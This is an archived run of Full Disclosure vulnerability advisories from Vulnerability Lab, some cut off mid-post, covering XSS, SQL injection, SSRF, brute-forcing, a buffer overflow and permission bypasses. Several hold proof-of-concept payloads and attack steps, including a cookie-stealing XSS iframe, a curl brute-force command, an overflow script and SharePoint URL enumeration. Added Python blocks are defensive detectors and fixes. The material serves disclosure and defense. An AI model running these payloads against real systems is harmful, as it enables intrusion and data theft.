  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html]


PoC: POST via add Mailbox in email input 

Email domain test-domain.com created.
Mailbox a>"<%3E%22%3CPERSISTENT SCRIPT CODE PAYLOAD EXECUTION!+src>@test-domain.com created.
Create a New Email Account or Forwarder (MailBox/Forwarder)
Here you can create a new email account or forwarder.
Create a New Email Account (MailBox)
Reference(s):
http://localhost:2030/index.php?module=mail_add-new 


Solution - Fix & Patch:
===
The vulnerabilities can be patched by sanitizing the vulnerable `id` and 
`email address` parameters of the index.php file POST method request. 
Disallow usage of special chars and restrict the parameter input to prevent 
script code injection attacks. Filter the output error location 
or the item listing, the vulnerable locations where the code point occurs.


Security Risk:
==
The security risk of the application-side input validation vulnerabilities in 
the web-application is estimated as medium. (CVSS 4.4)


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] Photo Vault v1.2 iOS - Insecure Authentication Vulnerability

2018-01-19 Thread Vulnerability Lab
Document Title:
===
Photo Vault v1.2 iOS - Insecure Authentication Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2110


Release Date:
=
2018-01-16


Vulnerability Laboratory ID (VL-ID):

2110


Common Vulnerability Scoring System:

4.8


Vulnerability Class:

Insecure Storage of Sensitive Information


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
https://itunes.apple.com/us/app/id1053383947


Abstract Advisory Information:
==
The Vulnerability Laboratory core research team discovered an insecure 
authentication issue in the official 


Vulnerability Disclosure Timeline:
==
2018-01-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

PhotoRange
Product: Photo Vault - Mobile (Web-Application) 1.2


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

An insecure configuration vulnerability has been discovered in the official 
Photo Vault v1.2 iOS mobile web-application.

The vulnerability is located in the login mechanism and the password request 
communication. When wifi is activated in the app, it is possible to remotely 
access (http-server) the password-protected vault. The password request is a 
simple, less-protected request to the login.html file, with `_` used to split 
the password from the file name. There is no request limitation to block 
automated attacks.

Attackers can quickly enumerate the password by simple audits against the 
http basic authentication mechanism. Remote attackers can use an automated 
dictionary attack or compromise the vault by a manual basic http brute-force 
attack via curl, nmap or http-brute. Attackers can quickly gain unauthorized 
access to the private vault over the activated wifi web-application in the 
same network. A second, minor problem is that no https protocol is activated 
for the wifi http-server communication in the network. Taken together, these 
two problems pose a significant risk to users and individuals, based on the 
sensitive information stored in the vault of the mobile iOS application.

The security risk of the insecure authentication configuration vulnerability 
is estimated as medium with a CVSS count of 4.8. Exploitation of the 
vulnerability requires network access to connect to the web-server via wifi, 
without user interaction. Successful exploitation of the vulnerability results 
in unauthorized access to private vault data or sensitive information.


Proof of Concept (PoC):
===
The security issue can be exploited by remote attackers without a privileged 
user account or user interaction.
For security demonstration or to reproduce the vulnerability, follow the 
provided information and steps below.


PoC: 
http_code=$(curl -L -data password="passwdords.txt" "$url 
http://Localhost:9900/login.html__"; -w '%{http_code}' -o /root/fuzztime -s) 
#forensic


--- PoC Session Logs [GET] ---
GET http://localhost:9900/login.html
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 
Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Localhost:9900/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:20 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked
Note: Requests first the login page
-
GET http://localhost:9900/login.html__passwd1
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 
Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:9900/login.html
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:26 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked

Note: Access to the vault of the iOS mobile application was cracked in a 
forensic access test within 15 minutes.


Reference(s):
http://localhost:9900/
http://localhost:9900/login.html
http://localhost:9900/login.html__


Security Risk:
==
The security risk of the vulnerability in the mobile vault application is 
estimated as medium (CVSS 4.8).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


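Since the advisory's core finding is the missing request limitation on the `login.html__<password>` path, the following added example (not part of the advisory, and not the app's code) shows a detection a defender could run over the vault's HTTP access log: it parses Common Log Format lines (a constructed sample, not the advisory's session logs) and flags any client that sends more than a threshold of distinct `login.html__` guesses inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access-log lines (Common Log Format); invented client
# addresses and guesses, not the advisory's own session logs.
SAMPLE_LOG = """\
192.0.2.10 - - [06/Jan/2018:15:06:20 +0000] "GET /login.html HTTP/1.1" 200 512
192.0.2.10 - - [06/Jan/2018:15:06:26 +0000] "GET /login.html__guess1 HTTP/1.1" 200 90
192.0.2.10 - - [06/Jan/2018:15:06:26 +0000] "GET /login.html__guess2 HTTP/1.1" 200 90
192.0.2.10 - - [06/Jan/2018:15:06:27 +0000] "GET /login.html__guess3 HTTP/1.1" 200 90
192.0.2.10 - - [06/Jan/2018:15:06:27 +0000] "GET /login.html__guess4 HTTP/1.1" 200 90
192.0.2.10 - - [06/Jan/2018:15:06:28 +0000] "GET /login.html__guess5 HTTP/1.1" 200 90
192.0.2.10 - - [06/Jan/2018:15:06:28 +0000] "GET /login.html__guess6 HTTP/1.1" 200 90
192.0.2.44 - - [06/Jan/2018:15:07:01 +0000] "GET /login.html HTTP/1.1" 200 512
192.0.2.44 - - [06/Jan/2018:15:07:09 +0000] "GET /login.html__secret HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# The app appends the password to login.html after a double underscore.
GUESS_RE = re.compile(r"^/login\.html__(?P<guess>[^?]+)")


def parse_line(line):
    """Parse one CLF line into a dict, or return None for unparsable input."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"],
        "status": int(m["status"]),
    }


def detect_enumeration(log_text, window=timedelta(seconds=60), threshold=5):
    """Return {ip: max_distinct_guesses} for clients that sent more than
    `threshold` distinct login.html__<guess> requests inside any `window`."""
    attempts = defaultdict(list)  # ip -> [(timestamp, guess)]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        gm = GUESS_RE.match(rec["path"])
        if gm is not None:
            attempts[rec["ip"]].append((rec["ts"], gm["guess"]))

    offenders = {}
    for ip, events in attempts.items():
        events.sort()
        best, start = 0, 0
        # Sliding window: drop events older than `window` from the front.
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({guess for _, guess in events[start:end + 1]})
            best = max(best, distinct)
        if best > threshold:
            offenders[ip] = best
    return offenders


if __name__ == "__main__":
    print(detect_enumeration(SAMPLE_LOG))  # {'192.0.2.10': 6}
```

A single legitimate login (the second client) stays below the threshold, while the burst of distinct guesses from the first client is reported; the same counter can drive a per-client lockout in the server itself.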

[FD] Zenario v7.6 CMS - SQL Injection Web Vulnerability

2018-01-15 Thread Vulnerability Lab
A%228ovqgY47Ej1ExIotzyCRzQ%3D%3D%22%2C%22session%22%3Afalse%7D%7D]
   Response Header:
  Server[Apache/2.4.23 (Ubuntu)]
  X-Frame-Options[SAMEORIGIN]
  Content-Length[1862]
  Connection[Keep-Alive]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
http://zenario.localhost:8080/
http://zenario.localhost:8080/zenario/
http://zenario.localhost:8080/zenario/admin/
http://zenario.localhost:8080/zenario/admin/admin_boxes.ajax.php


Solution - Fix & Patch:
===
1. Escape the content of the name input field
2. Sanitize the parameter of the current_value
3. Disallow the usage of special chars in the current_value parameter
4. Use a prepared statement to prevent further exploitation


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
web-application is estimated as medium (cvss 5.7).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab



[FD] MagicSpam 2.0.13 - Insecure File Permission Vulnerability

2018-01-15 Thread Vulnerability Lab
Document Title:
===
MagicSpam 2.0.13 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2113


Release Date:
=
2018-01-12


Vulnerability Laboratory ID (VL-ID):

2113


Common Vulnerability Scoring System:

2.8


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at 
the edge before it gets a chance to be filtered. 
There’s no need to change DNS or MX records. And your protection comes ready to 
go with complete logging, statistics, and custom controls.

(Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ )


Abstract Advisory Information:
==
An independent Vulnerability Laboratory researcher discovered an insecure file 
permission vulnerability in the MagicSpam 2.0.13-1 Plesk extension.



Vulnerability Disclosure Timeline:
==
2017-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

LinuxMagic
Product: MagicSpam - Plesk Extension 2.0.13-1


Exploitation Technique:
===
Remote


Severity Level:
===
Low


Technical Details & Description:

An insecure file permission access vulnerability has been discovered in the 
MagicSpam 2.0.13-1 plesk extension.
The vulnerability allows an attacker to access sensitive information like 
emails without permission or authentication.


Plesk panel features the freemium extension MagicSpam providing 
industry-leading spam protection technologies.
MagicSpam is keeping a detailed log of all e-mail messages processed under 
directory /var/log/magicspam/ in 
Ubuntu installations. A log file is created with the name mslog, with readable 
permissions for everyone, and rotated daily. 
The file will reveal the full list of mailboxes on the server (provided they 
received or sent at least one message in the past).

The security risk of the permission vulnerability is estimated as low with a 
common vulnerability scoring system count of 2.8. 
Successful exploitation of the file permission security vulnerability results 
in information disclosure of emails.


Proof of Concept (PoC):
===
The insecure file permission vulnerability can be exploited by remote attackers 
without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

$ id
uid=1002(marco) gid=1011(marco) groups=1011(marco)
$ cd /var/log/magicspam/
$ ls -l
-rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog
$ tail -n1 mslog
2018-01-10 11:51:26 magicspam-daemon[335]: HAM: 
mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=


Solution - Fix & Patch:
===
The security vulnerability can be resolved by excluding the emails from the 
affected application log files.
Another solution could be to integrate an authentication mechanism for the 
log file of the MagicSpam web-application.


Security Risk:
==
The security risk of the insecure file permission vulnerability in the Plesk 
extension MagicSpam is estimated as medium (CVSS 2.8).


Credits & Authors:
==
Marco Marsala [ma...@thenetworksolution.it] - 
https://www.vulnerability-lab.com/show.php?user=Marco+Marsala


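To show both mitigations the advisory names, the following added example (not the extension's code) writes a constructed mslog sample to a temporary file, checks whether it is world-readable as in the PoC's `ls -l` output, restricts it to its owner, and masks the mailbox local parts in the log lines; the addresses and hosts in the sample are invented.

```python
import os
import re
import stat
import tempfile

# Constructed sample mslog lines in the layout shown by the advisory's PoC;
# the addresses and hosts are invented, not taken from a real server.
SAMPLE_MSLOG = """\
2018-01-10 11:51:20 magicspam-daemon[335]: HAM: mua=no,ip=[198.51.100.7:mx.example.net],helo=mx.example.net,from=<alice@example.net>,rcpt=<bob@example.org>
2018-01-10 11:51:26 magicspam-daemon[335]: SPAM: mua=no,ip=[203.0.113.9:relay.example.com],helo=,from=<promo-123@lists.example.com>,rcpt=<carol@example.org>
"""

# Matches <local@domain> as written in the from=/rcpt= fields.
ADDR_RE = re.compile(r"<([^<>@\s]+)@([^<>@\s]+)>")


def redact_addresses(line):
    """Mask the mailbox local part so the log no longer enumerates accounts;
    the domain is kept because it is still useful for delivery troubleshooting."""
    return ADDR_RE.sub(lambda m: "<[redacted]@%s>" % m.group(2), line)


def world_readable(path):
    """True when 'other' may read the file, as for the -rw-r--r-- mslog in the PoC."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def restrict_to_owner(path):
    """Drop group/other bits (mode 0600) and return the resulting permission bits."""
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return stat.S_IMODE(os.stat(path).st_mode)


def demo():
    """Reproduce the exposure on a throwaway file and apply both mitigations.
    Returns (exposed_before, new_mode, exposed_after, redacted_lines)."""
    with tempfile.NamedTemporaryFile("w", delete=False) as fh:
        fh.write(SAMPLE_MSLOG)
        path = fh.name
    os.chmod(path, 0o644)               # same bits as the advisory's ls -l output
    exposed_before = world_readable(path)
    new_mode = restrict_to_owner(path)
    exposed_after = world_readable(path)
    redacted = [redact_addresses(line) for line in SAMPLE_MSLOG.splitlines()]
    os.unlink(path)
    return exposed_before, new_mode, exposed_after, redacted


if __name__ == "__main__":
    before, mode, after, lines = demo()
    print(before, oct(mode), after)
    print("\n".join(lines))
```

Because the advisory notes the log is rotated daily, the permission fix has to cover the rotated copies too (a logrotate `create 0600 magicspam root` directive, for instance), not only the live mslog.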

[FD] Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability

2018-01-13 Thread Vulnerability Lab
d the xml config file to overwrite the ecx and eip registers.
The installation path and the iis website values are not exploitable, because 
of the active content restrictions of the process that drops an invalid 
argument exception to prevent.


PoC: Exploit Code (XML)



PoC: Exploitation (Perl)
#!/usr/bin/perl
use strict;
use warnings;
# Build a 3000-byte overlong value for the XML config import.
my $Buff = "A" x 3000;
# Append the value to the text file used for the import test.
open(my $fh, '>>', 'kentico_unicode_payload.txt') or die "open: $!";
print $fh $Buff;
close($fh);
print "PoC (c) Vulnerability-Laboratory";


--- PoC Debug Session Logs [WinDBG] ---
(1522.21ec): Stack buffer overflow - code c409
eax= ebx=0044b208 ecx=00410041 edx=513cc7c2 esi=003a22d0 edi=00477cd0
eip=41004100 esp= ebp= iopl=0 nv up ei pl nz na po nc
cs=001c  ss=0022  ds=0022  es=0022  fs=002c  gs= efl=
41414141 cc22
-
EXCEPTION_RECORD:   -- (.exr )
ExceptionAddress: 41414141
   ExceptionCode: c409 (Stack Buffer Overflow)
  ExceptionFlags: 0001
NumberParameters: 1
   Parameter[0]: 0002


Solution - Fix & Patch:
===
The vulnerability can be patched by a secure file size and input character 
restriction like on the iis scheme website input.
Parse the full xml file on import and restrict the memory size on imports to 
prevent further buffer overflow attacks.


Security Risk:
==
The security risk of the local stack buffer overflow vulnerability in the 
kentico cms software is estimated as high. (CVSS 6.0)


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] SonicWall GMS v8.1 - Filter Bypass & Persistent Vulnerability

2018-01-12 Thread Vulnerability Lab
e 31th october 2016 and was finally 
resolved 2017 Q1 (v8.2). Please update your gms appliance web-application via 
service update or by manual interaction to prevent attacks.


Security Risk:
==
The security risk of the persistent input validation vulnerability and filter 
bypass issue is estimated as medium. (CVSS 4.1)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
[https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] 
[www.vulnerability-lab.com]



[FD] Magento Commerce - SSRF & XSPA Web Vulnerability

2018-01-12 Thread Vulnerability Lab
Document Title:
===
Magento Commerce - SSRF & XSPA Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1631


Release Date:
=
2018-01-03


Vulnerability Laboratory ID (VL-ID):

1631


Common Vulnerability Scoring System:

4.7


Vulnerability Class:

Server Side Request Forgery


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Magento is an open source e-commerce web application that was launched on March 
31, 2008 under the name Bento. It was developed 
by Varien (now Magento, a division of eBay) with help from the programmers 
within the open source community but is now owned 
solely by eBay Inc. Magento was built using parts of the Zend Framework. It 
uses the entity-attribute-value (EAV) database model 
to store data. In November 2013, W3Techs estimated that Magento was used by 
0.9% of all websites.

Our team of security professionals works hard to keep Magento customer 
information secure. What's equally important to protecting 
this data? Our security researchers and user community. If you find a site that 
isn't following our policies, or a vulnerability 
inside our system, please tell us right away.

( Copy of the Vendor Homepage: http://magento.com/security  &  
http://magento.com/security )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered an SSRF/XSPA 
vulnerability in the official Magento Commerce online service web-application.


Vulnerability Disclosure Timeline:
==
2018-01-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Ebay Inc.
Product: Magento - Web Application Service 2015 Q4


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

An SSRF/XSPA vulnerability has been discovered in the official Magento Commerce 
online service web-application.

The vulnerability allows remote attackers to perform malicious server-side 
requests to compromise the computer system or to gain unauthorized access to 
data or sensitive information. The XSPA & SSRF allows using the process 
functionality of the Magento engine as a port scanner for the local machine 
or any random remote machine in the same network. The issue is the first 
documented XSPA and SSRF issue in the Magento service web-applications.

The security risk of the vulnerability is estimated as medium with a CVSS 
(common vulnerability scoring system) count of 4.7.
Exploitation of the SSRF/XSPA vulnerability requires a privileged 
web-application user account and no user interaction.
Successful exploitation of the issue can result in web-server or 
web-application compromise or unauthorized malicious interactions.


Proof of Concept (PoC):
===
Remote attackers are able to perform a local scan on the protected web-server 
firewall of magento.com and magentocommerce.com.
For security demonstration or to reproduce the vulnerability, follow the 
provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open http://magento.com/security-patch (Magento Shoplift Bug Tester)
2. Write in the website input  www.magento.com:22
3. Click to bug scan for the port 22
4. Successful reproduction of the issue!

--- Scan Log NMAP ---
Starting Nmap 6.00 at 2016-08-15 15:10 EEST
Initiating Ping Scan at 15:10
Scanning magento.com (66.211.190.110) [4 ports]
Completed Ping Scan at 15:10, 0.17s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:10
Scanning magento.com (66.211.190.110) [100 ports]
Discovered open port 80/tcp on 66.211.190.110
Discovered open port 443/tcp on 66.211.190.110
Discovered open port 8443/tcp on 66.211.190.110
Discovered open port 8080/tcp on 66.211.190.110
Completed SYN Stealth Scan at 15:10, 2.38s elapsed (100 total ports)
......

Note: SSRF/XSPA allows scanning the local host to discover the open service 
ports
(Reference: https://cwe.mitre.org/data/definitions/918.html)


Solution - Fix & Patch:
===
The vulnerability has been resolved as bug bounty issue by the magento security 
team in 2017.


Security Risk:
==
The security risk of the ssrf/xspa web vulnerability that allows to scan the 
infrastructure behind the firewall is estimated as medium (CVSS 4.7).


Credits & Authors:
==
Vulnerability Laboratory [Core Research Team] (resea...@vulnerability-lab.com) 
[www.vulnerability-lab.com]


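The bug tester in this advisory fetched whatever host:port a privileged user typed, which is what turned it into a port scanner. The following added example (not Magento's code) shows the input check a server-side fetcher needs before making such a request: only http/https, only web ports, no credentials in the URL, and every resolved address outside loopback, private, link-local, multicast and reserved ranges. The resolver is injected and backed by a constructed table so the check runs offline; the hostnames and addresses are invented.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}           # a website checker only needs the web ports

# Address ranges a server-side fetcher must never be pointed at.
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]


def is_public_address(ip):
    """True unless `ip` falls in a loopback, private, link-local, multicast
    or reserved range; IPv4-mapped IPv6 addresses are unwrapped first."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped     # ::ffff:10.0.0.5 must be judged as 10.0.0.5
    return not any(addr in net for net in DENY_NETS)


def validate_target(raw, resolve):
    """Decide whether the server may fetch `raw` on the user's behalf.
    `resolve(host)` returns the list of IP strings for a hostname; it is
    passed in so the check can be exercised offline. Returns (ok, reason)."""
    if "://" not in raw:
        raw = "http://" + raw       # the input field accepts a bare host[:port]
    parts = urlsplit(raw)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        ips = resolve(parts.hostname)
    except OSError:
        ips = []
    if not ips:
        return False, "unresolvable host"
    for ip in ips:
        if not is_public_address(ip):
            return False, "resolves to non-public address %s" % ip
    return True, "ok"


# Constructed stand-in for DNS so the example runs offline; not real records.
FAKE_DNS = {
    "shop.example.com": ["198.51.100.20"],
    "internal.example.com": ["10.0.0.5"],
    "both.example.com": ["198.51.100.21", "::ffff:127.0.0.1"],
    "localhost": ["127.0.0.1"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for target in ("www.magento.com:22", "shop.example.com",
                   "http://internal.example.com/", "both.example.com"):
        print(target, "->", validate_target(target, fake_resolve))
```

The name is resolved once here, so the fetch must connect to the validated address and re-run the check on every redirect; otherwise DNS rebinding or a 302 to an internal host reintroduces the problem.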

[FD] Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability

2018-01-12 Thread Vulnerability Lab
Document Title:
===
Microsoft Sharepoint 2013 - Limited Access Permission Bypass Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2111


Release Date:
=
2018-01-07


Vulnerability Laboratory ID (VL-ID):

2111


Common Vulnerability Scoring System:

4.8


Vulnerability Class:

Filter or Protection Mechanism Bypass


Current Estimated Price:

1.000€ - 2.000€


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered a permission 
bypass vulnerability in the Microsoft Sharepoint online service web-application.


Vulnerability Disclosure Timeline:
==
2018-01-07: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Microsoft Corporation
Product: Sharepoint Online Service - (Web-Application) 2013


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Technical Details & Description:

A permission level bypass web vulnerability has been identified in the 
Microsoft SharePoint 2013 online service web-application and possibly prior 
versions. The security vulnerability allows attackers to open or view restricted 
items in the site or library. An authenticated user can bypass `Limited Access` 
permissions to browse a page or library and access a specific content item that 
was restricted.


Proof of Concept (PoC):
===
POC 1:
1. Search for specific words in the web and mobile SharePoint search box: 
`password` `pass` `user` `domainuser` `name | lastname` ...

[~] web search: http://site/BSearch/results.aspx
[~] mobile search:  http://site/_layouts/mobile/MobileResults.aspx

example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA1377";
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB

2. The page shows some of SharePoint's search results, such as the URLs of 
restricted items, sites and libraries.
3. Click the URLs to access, view or read the site page and the other restricted 
library items.


POC 2:
After capturing packets between our system and the SharePoint site (using Fiddler, 
Burp Suite, Wireshark, ...) 
we have access to item, list, page and site URLs like the following:

http://site/IT/Lists/List70/AllItems.aspx

Access restricted items and lists by constructing /List#/ URLs 

Example:
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx


Security Risk:
==
The security risk of the bypass vulnerability in the microsoft sharepoint 2013 
application is estimated as medium (CVSS 4.8).


Credits & Authors:
==
Behnam Vanda [beni.va...@gmail.com] [redhathackers] - 
https://www.vulnerability-lab.com/show.php?user=Behnam+Vanda


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
case of damage, including direct, indirect, incidental, consequential loss of 
business profits or special damages, even if Vulnerability Labs or its 
suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not 
approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data. We have no need for 
criminal activities or membership requests. We do not publish advisories 
or vulnerabilities of religious-, militant- and racist- 
hacker/analyst/researcher groups or individuals. We do not publish trade 
researcher mails, 
phone numbers, conversations or anything else to journalists, investigative 
authorities or private individuals. 

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
- www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php- 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php- 
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
- youtube.com/user/

[FD] Magento Connect T1 - (Claim) Persistent Vulnerability

2018-01-12 Thread Vulnerability Lab
.magentocommerce.com/magento-connect/claim/claim/new/]
  Cookie
  X-Forwarded-For[8.8.8.8]
  Connection[keep-alive]
   Post Data:
  
claim%5Bclaimed_extension_url%5D[%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28document.cookie%29%22%3E%3C%2Fiframe%3E]
  claim%5Boriginal_extension_url%5D[]
  claim%5Bdescription%5D[]
  claim%5Bdigital_signature%5D[]
   Response Headers:
  Server[nginx]
  Content-Type[text/html; charset=UTF-8]
  Connection[keep-alive]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
  Set-Cookie[frontend=4edl2ftb4c6qoe11lieojciaj7; path=/magento-connect/; 
domain=www.magentocommerce.com]
  Content-Length[71413]


Solution - Fix & Patch:
===
The security vulnerability is marked as fixed within 2017 Q1 - 2017 Q4 by the 
magento developer team.


Security Risk:
==
The security risk of the persistent input validation web vulnerability is 
estimated as medium (CVSS 3.8).


Credits & Authors:
==
Vulnerability-Lab [ad...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Any modified copy or reproduction, including partially usages, of this file, 
resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other media, are reserved by 
Vulnerability Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website is 
trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or edit our material contact (admin@) to get an ask permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities

2018-01-12 Thread Vulnerability Lab
ile or directory in 
/home/x/public_html/x/piwigo/admin/languages.php on line 48
Warning: include(): Failed opening './admin/languages_>"<[MALICIOUS PAYLOAD 
EXECUTION!]>.php' for inclusion 
(include_path='.:/usr/share/php:/usr/share/pear') in 
/home/x/public_html/x/piwigo/admin/languages.php on line 48
http://www.w3.org/TR/html4/strict.dtd";>




Just another Piwigo gallery :: Piwigo Administration



Vulnerable Source: to (form)

<<><[MALICIOUS PAYLOAD EXECUTION!]> ">
  Update in 
progress...
<<><[MALICIOUS 
PAYLOAD EXECUTION!]> ">



Vulnerable Source: installstatus (error exception)

  

  
Plugins 
list
  
  
Check for 
updates
  
  
Other plugins 
available
  


  

  An error occured during the files (<[MALICIOUS PAYLOAD EXECUTION!]>) 
extraction.
  Please check "plugins" folder and sub-folders permissions 
(CHMOD).

  


Reference(s):
http://piwigo.localhost:8080/
http://piwigo.localhost:8080/piwigo/
http://piwigo.localhost:8080/piwigo/admin.php


Solution - Fix & Patch:
===
The XSS web vulnerabilities can be patched by a secure restriction of the 
parameter inputs in GET method requests.
Sanitize the vulnerable parameters and disallow the usage of special chars to 
prevent further script code injection attacks. 
Parse the output locations in the status messages and exceptions to resolve the 
client-side vulnerabilities.
Escape the contents to deliver them in a secure format.


Security Risk:
==
The security risk of the client-side cross site scripting web vulnerabilities 
in the content management system is estimated as medium (CVSS 3.4).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] MagicSpam 2.0.13 - Insecure File Permission Vulnerability

2018-01-12 Thread Vulnerability Lab
Document Title:
===
MagicSpam 2.0.13 - Insecure File Permission Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2113


Release Date:
=
2018-01-12


Vulnerability Laboratory ID (VL-ID):

2113


Common Vulnerability Scoring System:

2.8


Vulnerability Class:

Privacy Violation - Information Disclosure


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
